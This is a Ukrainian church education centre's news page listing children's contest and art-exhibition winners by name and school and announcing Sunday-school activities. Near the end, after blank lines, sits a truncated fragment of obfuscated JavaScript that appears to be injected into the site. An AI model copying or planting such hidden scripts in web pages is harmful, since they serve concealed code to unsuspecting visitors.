ІІІ місце – Яровий Костянтин, учень  3 кл. Глухівського НВК №4.

Номінація «Краще оповідання»

І місце  -Муха Єлизавета (8 років), ЗОШ  №2 

ІІ вікова категорія ( 10 – 13 років)

 Номінація «Кращий віршований твір»

І місце – Громак Артем, учень 6 кл. ЗОШ №2;

ІІ місце – Фокіна Ірина (11 років), учениця Кучерівського НВК;

ІІІ місце – Рева Аліна. Учениця 7 кл. Суходільського НВК;

Номінація «Краще оповідання»

І місце – Лежавська Альона, Учениця Слоутського НВК.

ІІІ вікова категорія ( 14 – 17 років) 

Номінація «Кращий віршований твір»

І місце – Дегтярьова Олена, учениця 8 кл. Глухівського НВК;

ІІ місце –Перерва Валерія (16 років), учениця Березівського НВК;

ІІІ місце – Воробйова Діана, учениця 9 кл. Будівельнівського НВК;

Номінація «Краще оповідання»

І місце – Кущенко Євгенія, учениця 9 кл.  Кучерівського НВК;

ІІ місце – Манжара Наталія, учениця 8 кл. Глухівського НВК №4;

ІІІ місце – Багута Катерина (16 років), учениця Березівського НВК.

This slideshow requires JavaScript.

З 14 по 27 жовтня в приміщенні духовно-просвітницького центру Глухівського благочиння при кафедральному соборі Трьох Анастасій проходила виставка дитячих робіт «Квіти для Богородиці», присвячена святу Покрова Пресвятої Богородиці.

   До участі у даному заході були запрошені діти недільних шкіл Глухівського благочиння а також загальноосвітніх шкіл району, крім того – вихованці Глухівського  міського центру позашкільної освіти, вихованці духовно-просвітницького центру Глухівського благочиння та діти-інваліди міського реабілітаційного територіального центру. Учасниками виставки стали близько 150 дітей. Для підведення підсумків було створено компетентне жюрі, яке і обрало переможців. Ними стали  26 дітей та 10 колективів.

Список переможців виставки «Квіти для Богородиці» 

 1. Колектив недільної школи на честь Різдва Пресвятої Богородиці с. Соснівка.
 1. Колектив недільної школи на честь Праведної Анни

с. Білокопитове.

 1. Колектив Глухівського міського центру соціальної реабілітації дітей-інвалідів.
 2. Колектив гуртка «Чарівна голка» Соснівського НВК
 3. Колектив початкової недільної школи «Промінчики» духовно- просвітницького центру Глухівського благочиння.
 4. Колектив Шалигінського дошкільного навчального закладу «Горобинка».
 5. Колектив 1 класу Слоутського НВК.
 6. Колектив гуртка «Витинанка» Ходинського НВК
 7. Колектив Уланівської недільної школи.
 8. Колектив недільної школи с. Привілля.
 1. Бокова Антоніна – учениця Студенецький НВК.
 2. Сухенко Катерина – учениця Перемозького НВК.
 3. Волошина Дарина – учениця Первомайського НВК.
 4. Шаматріна Ксенія – учениця Шалигінської ЗОШ І – ІІІ ст.
 5. Крюкова Юлія – учениця Шалигінської ЗОШ І – ІІІ ст.
 6. Стрімоухова Юлія – учениця Некрасівського НВК.
 7. Сухопар Максим – учень Слоутського НВК.
 8. Пата Діана – учениця Слоутського НВК.
 9. Сапутіна Вікторія – вихованка недільної школи на честь Різдва Пресвятої Богородиці с. Соснівка.
 10. Гулакова Софія – вихованка недільної школи на честь Різдва Пресвятої Богородиці с. Соснівка.
 11. Лисенко Анастасія – вихованка недільної школи на честь……… с. Уланове.
 12. Хандій Катерина – вихованка недільної школи на честь……… с. Годунівка.
 13. Старченко Яна – учениця Дунаєцького НВК.
 14. Нікішина Єлизавета –учениця Березівського НВК.
 15. Шевель Софія – учениця Березівського НВК.
 16. Савчук Анна – учениця Червонянської ЗОШ І – ІІІ ст.
 17. Кривонос Софія – учениця Червонянської ЗОШ І – ІІІ ст.
 1. Пугач Дмитро – вихованець Глухівського міського центру соціальної реабілітації дітей-інвалідів.
 2. Дудко Ігор – вихованець Глухівського міського центру соціальної реабілітації дітей-інвалідів.

30.Целікова Ярослава – вихованка МЦПО.

31.Троша Ангеліна – вихованка МЦПО.

 1. Гугліна Діана – вихованка МЦПО.
 2. Пономарьова Валерія – вихованка МЦПО.
 3. Антипенко Марія – вихованка духовно-просвітницького центру Глухівського благочиння.
 4. Пустовойтова Арина – вихованка духовно-просвітницького центру Глухівського благочиння.
 5. Гриценко Ніна – вихованка духовно-просвітницького центру Глухівського благочиння.

Нагородження  переможців відбулося в Соборі Трьох Анастасій 11 листопада на свято Анастасії Римлянині. Після Божественної Літургії Преосвященнійший Роман єпископ Конотопський та Глухівський привітав діток та вручив їм грамоти і подарунки.

This slideshow requires JavaScript.

21 листопада   в Духовно-просвітницькому центрі пройшов  виховний захід « Турбота про птахів». В ході заходу була проведена вікторина «Що ти знаєш про птахів».  Потім вихованці розвішали годівнички для птахів,  на прилеглій до Собору Трьох Анастасій території, які виготовили власноруч разом з батьками. Наприкінці заходу був проведений майстер-клас по виготовлення пташки із сизалю.

ЗАНЯТТЯ В НЕДІЛЬНІЙ ШКОЛІ РОЗПОЧАЛИСЬ

Духовно-просвітницький центр Глухівського благочиння при кафедральному соборі Трьох Анастасій продовжує набір дітей та учнівської молоді.

Вихованці центру вивчають Закон Божий, житія святих, основи християнської етики. В цікавій ігровій формі проводяться уроки доброти для діток дошкільного віку. Крім того, невід’ємною частиною занять є виготовлення поробок в різних техніках. А з жовтня місяця починає працювати гурток образотворчого мистецтва. Тож світлі просторі кімнати чекають на нових вихованців. Хотілося б подякувати усім благодійникам, а особливо меру міста Юрію Олександровичу Бурлаці, який надав допомогу для оснащення класних кімнат меблями. Також, користуючись нагодою, запрошуємо всіх глухівчан та гостей міста відвідати виставку дитячих робіт «Квіти для Богородиці», яка проходитиме в нашому центрі з 14 по 25 жовтня. (Для більш детальної інформації можна звертатися за телефоном: 099-2320531)

 

IMG_1229 IMG_1249

 

 

 

 

 

 

 

 

 

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “trehanastasiy.church.ua”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *